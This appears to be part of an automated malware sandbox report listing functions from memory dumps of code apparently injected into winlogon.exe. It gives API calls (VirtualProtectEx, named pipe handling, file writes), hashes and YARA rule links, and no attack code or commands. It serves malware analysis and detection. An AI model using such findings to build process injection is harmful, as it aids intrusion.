GetCurrentThreadId.KERNEL32 ref: 00000225DC645806

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
Instruction ID: a4b7c35c2db1f1b914b8e8535d9430e2c3f20039a046fe468dad81212f6f9600
Opcode Fuzzy Hash: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
Instruction Fuzzy Hash: F161B83A51DFA4DAE760DB99E45831AB7A0F388B45F108155FA8E87BA8DB7CC540CF00

Function 00000225DC6A57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC6A5806

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: f3e0eecdbf7d1ecc68755703d983f6d92ad5bf0be7b3d4789e27b32bced6994e
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 4061EE3A519F90D6E764DB99E44831AB7E1F388B56F208115FA8D87BA8DB7CC440CF04

Function 00000225DC6212B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000225DC6212E0
_set_statfp.LIBCMT ref: 00000225DC6212FB
_set_statfp.LIBCMT ref: 00000225DC621317
_set_statfp.LIBCMT ref: 00000225DC621353

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: e9220e0b73b1d97bc8ad9bb70746f7ec3aeed8aed2e016e4c1d481caacef4710
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4B11C82FA5CE3121F7A411EDE55E3E990526B58376F58C634FB7716BDA8A388C42C200

Function 00000225DC6812B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000225DC6812E0
_set_statfp.LIBCMT ref: 00000225DC6812FB
_set_statfp.LIBCMT ref: 00000225DC681317
_set_statfp.LIBCMT ref: 00000225DC681353

Memory Dump Source

Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: da2733c5c8d00c9bee26e41522eed5cd81350da1459278537785505115084ab5
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: BB11082FA54E3023F7A591EDE45E3A911407F68776F48C634EB7706BDA8A388C42C203

Function 00000225DC651EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000225DC651EE0
_set_statfp.LIBCMT ref: 00000225DC651EFB
_set_statfp.LIBCMT ref: 00000225DC651F17
_set_statfp.LIBCMT ref: 00000225DC651F53

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 9c3a901dbb96c7a6d5f7416683512413e85e2737f534a2496eaaa02b9f688107
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 6011822AA74E3162F6A815ECE55E36D11817B75376F39C624BAB7073D78B798C42C200

Function 00000225DC6B1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000225DC6B1EE0
_set_statfp.LIBCMT ref: 00000225DC6B1EFB
_set_statfp.LIBCMT ref: 00000225DC6B1F17
_set_statfp.LIBCMT ref: 00000225DC6B1F53

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 4999fd702e983ea01f22114a1bcd8f0d8673cf6f2ddc95b9751a18649ea2bf0c
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3E11A52EA54E31B2F6A81DECE55E36911CB7B65377F08C624BA76063D79B788C42C200

Function 00000225DC6A3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000225DC6A3886
GetCurrentProcess.KERNEL32 ref: 00000225DC6A38B4
VirtualProtectEx.KERNEL32 ref: 00000225DC6A38D6
GetCurrentProcess.KERNEL32 ref: 00000225DC6A38F4
VirtualProtectEx.KERNEL32 ref: 00000225DC6A3915

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 42adf252b2fdd566a487890801640a035baaf57411252a283d14ccc2d570c1fb
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 9311392A704F50A2EB149BA9F41866AB7A5FB88F86F148039DE8947794EF3DC508C704

Function 00000225DC6184F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC618503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC618598

Strings

f, xrefs: 00000225DC618516
csm, xrefs: 00000225DC61857E

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: c4eb3d63776d4055a531065f3b4a1210afd8ee410b87a796abb7a39806a070ee
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 9751CF3A713A60ABEF54CFADE848B193395F358B9BF52C224DA0647788EB34C841C744

Function 00000225DC6784F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC678503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC678598

Strings

csm, xrefs: 00000225DC67857E
f, xrefs: 00000225DC678516

Memory Dump Source

Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: b25bd1c368716a4e0e81f0a06a3d6b2adff4ec5042aaa9a6ae596e9c18bc936f
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 0051E33A312A20ABEB54DF6DE448B183795F358B9BF51CA24DA0663BC8EB34CC41C705

Function 00000225DC6184D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC618503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC618598

Strings

f, xrefs: 00000225DC618516
csm, xrefs: 00000225DC61857E

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 98add750b6747b53a7348f9af74011a36cd34dbe0a1de91b26c58f32e7b33695
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: D631C07A212A60AAEB54DF5AE84871977A4F748BDBF56C214AE4B07784CB38C940C704

Function 00000225DC6784D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC678503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC678598

Strings

csm, xrefs: 00000225DC67857E
f, xrefs: 00000225DC678516

Memory Dump Source

Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 4fb1426d4b0cbfc538e4fb8421eb22a2ed130e1c0ac3dd51622559385a3aac05
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 2B31C07A211A60AAEB54DF5AE848B1937A4F748BDBF05C614AE4A17BC4CB38CD40C705

Function 00000225DC6414B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC6414D5
HeapFree.KERNEL32 ref: 00000225DC6414E4
GetProcessHeap.KERNEL32 ref: 00000225DC6414F0
HeapFree.KERNEL32 ref: 00000225DC6414FF
GetProcessHeap.KERNEL32 ref: 00000225DC64152A

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: e326b0d558216964c1bb90aba37888528c21a75a5d3d4e8eecd90829191c5857
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: 9211827A528FA4A2E765DFBAA84821AB770F789F85F148429DB8A03755DF38C051C740

Function 00000225DC6426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000225DC6427D4
StrCpyW.SHLWAPI ref: 00000225DC6427ED

Strings

\\.\pipe\, xrefs: 00000225DC6427DF

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: e84ec4e56ed1e90a05ef63eae199e49c7ac373d922cc0b8786abc0fb272ba263
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 9871043A21CFA165EB25DFEE98483AE7791F749B86F648066DE4B43B89DE34C504C700

Function 00000225DC6A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000225DC6A27D4
StrCpyW.SHLWAPI ref: 00000225DC6A27ED

Strings

\\.\pipe\, xrefs: 00000225DC6A27DF

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: d12b274edd156fd082638bfaa4ca778a18f09c4e7acfd800022e022de31a8ae9
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: DF71063A284FA1A1E729DFAE99483EAA391F744B86F648026DD4D83B89DF34C504C700

Function 00000225DC6424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000225DC6425C3
StrCpyW.SHLWAPI ref: 00000225DC6425DA

Strings

\\.\pipe\, xrefs: 00000225DC6425CE

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 82a189bbe50c5a58e74aff3149cadbbba18f33c2f75b78c150759b162fa20576
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: E051FC3A20CFA163EA769FEE955C36A7751F385B81F208165DD8B43B9ACE35C441CB40

Function 00000225DC6A24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000225DC6A25C3
StrCpyW.SHLWAPI ref: 00000225DC6A25DA

Strings

\\.\pipe\, xrefs: 00000225DC6A25CE

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: cc81301975acbc3bdc9d2eb18399531ce39cc04ac7486b31e5b3b3d3a3b0ffd4
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: B551203A289FA163EA35DFAD915C3AE6751F385B81F20D025CD8D83BAACE35D401CB40

Function 00000225DC650604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000225DC65071B
GetLastError.KERNEL32 ref: 00000225DC65073D

Strings

U, xrefs: 00000225DC6506C7

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: dbd3c59a83022a55f629b447afb55701cd426435ed0c6f26eff50a32d3407be4
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 0241D776324F90A5EB20DF69E44839AB7A0F398B85F508025EE8E87798DF3CC541CB40

Function 00000225DC6B0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000225DC6B071B
GetLastError.KERNEL32 ref: 00000225DC6B073D

Strings

U, xrefs: 00000225DC6B06C7

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 6b276c1d234bb8f25c6064979ad644cd6b82844d934e07ca1d1a57b464edc023
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 8841E976314E50A1EB20DF69E44839ABBA1F7987C6F508025EE4D87798EF3CC541CB40

Function 00000225DC64D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC64D6F9
LCMapStringW.KERNEL32 ref: 00000225DC64D781

Strings

LCMapStringEx, xrefs: 00000225DC64D6DC, 00000225DC64D6ED

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 96e3d65a4d9add6818bea14478ca5d8bc85ea27d49f2560d141d73b6693779a1
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: EE111A3A608BD096D760CB5AF48429AB7A4F7C9B90F548126EE8E83B59DF38C450CB00

Function 00000225DC6AD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC6AD6F9
LCMapStringW.KERNEL32 ref: 00000225DC6AD781

Strings

LCMapStringEx, xrefs: 00000225DC6AD6DC, 00000225DC6AD6ED

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: cb534144ff171c414bc7ef4ddf8f009e4a3f6790c9b4bf86c512c87e9ed65ee8
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: A9111A3A608BD096DB64CB5AF48429AB7A5F7C9B91F548126EE8D83B59DF38C450CB00

Function 00000225DC6494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000225DC6494E8
RaiseException.KERNEL32 ref: 00000225DC64952E

Strings

csm, xrefs: 00000225DC64951B

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 354041a0a2ecc4c9e9bc09221ca2bb7f4da21dcaa4cc32c5419b9af12a7b4355
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 1D114C36218F9092EB658F19F44425977A4F788F99F288260DF8D07B68DF38C552CB00

Function 00000225DC6A94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000225DC6A94E8
RaiseException.KERNEL32 ref: 00000225DC6A952E

Strings

csm, xrefs: 00000225DC6A951B

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 4b92308cc5971c97455cfe5810083c2969dc8172d77cd0f3ca93aac080620cdf
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 6B111C36218F9092EB618F59E44425A77A5FB88B99F288221DF8D47B68DF38C556CB00

Function 00000225DC64D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC64D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000225DC64D6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000225DC64D681

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 753a0c4c8e75c7b377fb19d25a41dc167e0867bab3c2666fc635be3435da41e9
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: C8F02729728FB0B1E7059BC9F4082A53360EB88F82F68C161EA4A03B14CF38C894CB00

Function 00000225DC6AD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC6AD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000225DC6AD6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000225DC6AD681

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 15065ee6f9c7cdb5ee65a80d5012db01730a101526d0ffad1630422f33bff185
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 7DF0A729314FB0B1EB059BCDF4486A56372EB88F93F59D025EA5903B65CF38C995CB00

Function 00000225DC61CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC61CBC5

Strings

November, xrefs: 00000225DC61CBA8, 00000225DC61CBB2
October, xrefs: 00000225DC61CBBE

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: ad5d257609b9ae283b254a7c1adf856348e354321dbb8be3287acd0e2c9a4b05
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 18E09229306E51B2EE059BDDF44C2F8B321DB94747FAAD021991A06256CE38C986D340

Function 00000225DC67CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC67CBC5

Strings

November, xrefs: 00000225DC67CBA8, 00000225DC67CBB2
October, xrefs: 00000225DC67CBBE

Memory Dump Source

Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 95b1334a58423dabd032f5bac3f661d812c70f46580b33679b560d0baad2b08e
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 03E09229300D51B2FE05DBDDF4582F42321DF88B42F69D421A559066D2CE38C886D341

Function 00000225DC64D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC64D631
TlsSetValue.KERNEL32 ref: 00000225DC64D648

Strings

FlsSetValue, xrefs: 00000225DC64D61E

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 7188367852273573d0506cae3145d3ebffeb3ec7035bda74b2e084343ebc6817
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: DCE09269628E50B1EB054BDCF80C6A93362FB88F82F68C162DA0A06355CE38C855C700

Function 00000225DC6AD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000225DC6AD631
TlsSetValue.KERNEL32 ref: 00000225DC6AD648

Strings

FlsSetValue, xrefs: 00000225DC6AD61E

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

